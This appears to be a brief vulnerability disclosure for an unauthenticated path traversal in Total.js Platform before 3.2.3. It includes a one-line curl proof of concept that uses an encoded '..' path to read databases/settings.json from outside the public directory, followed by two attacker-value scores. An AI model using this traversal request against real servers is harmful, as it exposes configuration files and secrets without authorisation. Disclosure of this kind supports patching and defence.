index.js in Total.js Platform before 3.2.3 allows path traversal.
Mad-robot at July 05, 2020 2:29pm UTC reported:
Totaljs – Unauthenticated Directory Traversal
User can make requests like "GET /../databases/settings.json HTTP/1.1" and include file contents from outside the /public directory, which is the default directory for accessible static files.
PROOF OF CONCEPT
$ curl -v --path-as-is http://127.0.0.1:8000/.%2e/databases/settings.json
Assessed Attacker Value: 3
Assessed Attacker Value: 5